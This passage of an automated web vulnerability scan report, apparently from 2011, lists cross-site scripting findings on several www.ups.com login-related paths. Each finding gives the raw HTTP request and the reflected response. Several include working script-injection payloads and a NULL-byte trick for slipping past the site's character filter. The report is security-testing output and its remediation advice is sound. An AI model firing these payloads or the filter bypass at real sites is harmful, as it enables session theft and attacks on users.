The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c0c8'%3b1919f17d50a was submitted in the REST URL parameter 2. This input was echoed as 6c0c8';1919f17d50a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /qvadmin/admin6c0c8'%3b1919f17d50a HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44453


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmin/admin6c0c8';1919f17d50a?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/qvadmin/admin6c0c8';1919f17d50a?appid=CVA';
actionUrl = "/one-to-one/lo
...[SNIP]...

1.175. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f64"%20a%3db%20aadbdf6cf43 was submitted in the REST URL parameter 2. This input was echoed as d4f64" a=b aadbdf6cf43 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admind4f64"%20a%3db%20aadbdf6cf43 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44537


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/qvadmin/admind4f64" a=b aadbdf6cf43?appid=CVA">
...[SNIP]...

1.176. https://www.ups.com/qvadmin/admin [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d747f'-alert(1)-'1b60fb3e3a6 was submitted in the loc parameter. This input was echoed as d747f'-alert(1)-'1b60fb3e3a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /qvadmin/admin?loc=en_US%00d747f'-alert(1)-'1b60fb3e3a6&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
3e3a6&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_d747f'-alert(1)-'1b60fb3e3a6&appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_d747f'-alert(1)-'1b60fb3e3a6&appid=CVA';
actionUrl = "/one-to-on
...[SNIP]...

1.177. https://www.ups.com/qvadmin/admin [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055a41"><script>alert(1)</script>778c84f00ce was submitted in the loc parameter. This input was echoed as 55a41"><script>alert(1)</script>778c84f00ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /qvadmin/admin?loc=en_US%0055a41"><script>alert(1)</script>778c84f00ce&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_55a41"><script>alert(1)</script>778c84f00ce&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_55a41%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B778c84f00ce%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.178. https://www.ups.com/qvadmin/admin [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %008f676</script><script>alert(1)</script>17aa4dd78c7 was submitted in the loc parameter. This input was echoed as 8f676</script><script>alert(1)</script>17aa4dd78c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /qvadmin/admin?loc=en_US%008f676</script><script>alert(1)</script>17aa4dd78c7&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_8f676</script><script>alert(1)</script>17aa4dd78c7&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_8f676
...[SNIP]...

1.179. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dddb"%20a%3db%204ee8ba2c754 was submitted in the REST URL parameter 2. This input was echoed as 6dddb" a=b 4ee8ba2c754 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp6dddb"%20a%3db%204ee8ba2c754 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44452


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/sharp/prefapp6dddb" a=b 4ee8ba2c754">
...[SNIP]...

1.180. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 359b8%0ad79fe9d4b74 was submitted in the REST URL parameter 2. This input was echoed as 359b8
d79fe9d4b74
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sharp/prefapp359b8%0ad79fe9d4b74 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44351


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/sharp/prefapp359b8
d79fe9d4b74
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/sharp/prefapp359b8
d79
...[SNIP]...

1.181. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6808'%3bdb8080cd607 was submitted in the REST URL parameter 2. This input was echoed as f6808';db8080cd607 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sharp/prefappf6808'%3bdb8080cd607 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44368


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
8080cd607';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/sharp/prefappf6808';db8080cd607';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/sharp/prefappf6808';db8080cd607';
actionUrl = "/one-to-one/login?ID=100&loc=" + t
...[SNIP]...

1.182. https://www.ups.com/sharp/prefapp [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0066d80</script><script>alert(1)</script>b0ec02ae3bc was submitted in the loc parameter. This input was echoed as 66d80</script><script>alert(1)</script>b0ec02ae3bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%0066d80</script><script>alert(1)</script>b0ec02ae3bc&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_66d80</script><script>alert(1)</script>b0ec02ae3bc';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_66d80</script>
...[SNIP]...

1.183. https://www.ups.com/sharp/prefapp [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00719ef'-alert(1)-'2df5a1668f0 was submitted in the loc parameter. This input was echoed as 719ef'-alert(1)-'2df5a1668f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%00719ef'-alert(1)-'2df5a1668f0&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'2df5a1668f0';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_719ef'-alert(1)-'2df5a1668f0';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_719ef'-alert(1)-'2df5a1668f0';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.184. https://www.ups.com/sharp/prefapp [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0039e38"><script>alert(1)</script>3b2cdfd84b8 was submitted in the loc parameter. This input was echoed as 39e38"><script>alert(1)</script>3b2cdfd84b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%0039e38"><script>alert(1)</script>3b2cdfd84b8&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_39e38"><script>alert(1)</script>3b2cdfd84b8&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_39e38%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B3b2cdfd84b8%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.185. https://www.ups.com/uis/create [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload ad3bb%0a74617239e86 was submitted in the REST URL parameter 1. This input was echoed as ad3bb
74617239e86
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uisad3bb%0a74617239e86/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42143


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/uisad3bb
74617239e86
/create?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uisad
...[SNIP]...

1.186. https://www.ups.com/uis/create [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4095b"%20a%3db%20b63a7a57432 was submitted in the REST URL parameter 1. This input was echoed as 4095b" a=b b63a7a57432 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis4095b"%20a%3db%20b63a7a57432/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42241


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/uis4095b" a=b b63a7a57432/create?appid=UIS">
...[SNIP]...

1.187. https://www.ups.com/uis/create [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b1bd'%3b588801ad5 was submitted in the REST URL parameter 1. This input was echoed as 3b1bd';588801ad5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uis3b1bd'%3b588801ad5/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42137


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
